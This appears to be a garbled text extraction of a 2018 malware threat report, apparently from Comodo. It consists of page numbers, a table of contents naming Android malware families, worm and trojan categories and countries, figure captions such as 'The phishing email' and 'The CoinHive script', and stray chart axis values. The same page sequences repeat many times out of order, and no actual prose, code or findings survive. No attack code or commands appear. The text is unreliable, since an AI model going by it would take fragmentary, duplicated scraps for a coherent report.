Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 6 of 73








of 73




The phishing email


Page 8 of 73




The phishing email


Page 9 of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 7 of 73




The phishing email


of 73




The phishing email


Page 9 of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 8 of 73




The phishing email


of 73




Page 10 of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 9 of 73




of 73



Page 11 of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 10 of 73



of 73






Page 12 of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 11 of 73






of 73







Page 13 of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 12 of 73







of 73





Page 14 of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 13 of 73





of 73


The phishing email





Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 14 of 73


The phishing email





of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


Page 16 of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 15 of 73







43188

46382

48881

40000

41000

42000

43000

44000

45000

46000

47000

48000

49000

50000

Apr May Jun


of 73










Page 17 of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 16 of 73










of 73



BadShell at work


Page 18 of 73



Page 19 of 73










Page 20 of 73







Page 21 of 73





Page 22 of 73




The CoinHive script



Page 23 of 73










Page 24 of 73











Page 25 of 73





Page 26 of 73





The digital spooks


Page 27 of 73





Version-3

PU








Page 28 of 73



Version-2 Settings




Page 29 of 73











Upload image files






Page 30 of 73



Records screen


Records calls


Virtual Girlfriend











Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



Page 32 of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 17 of 73



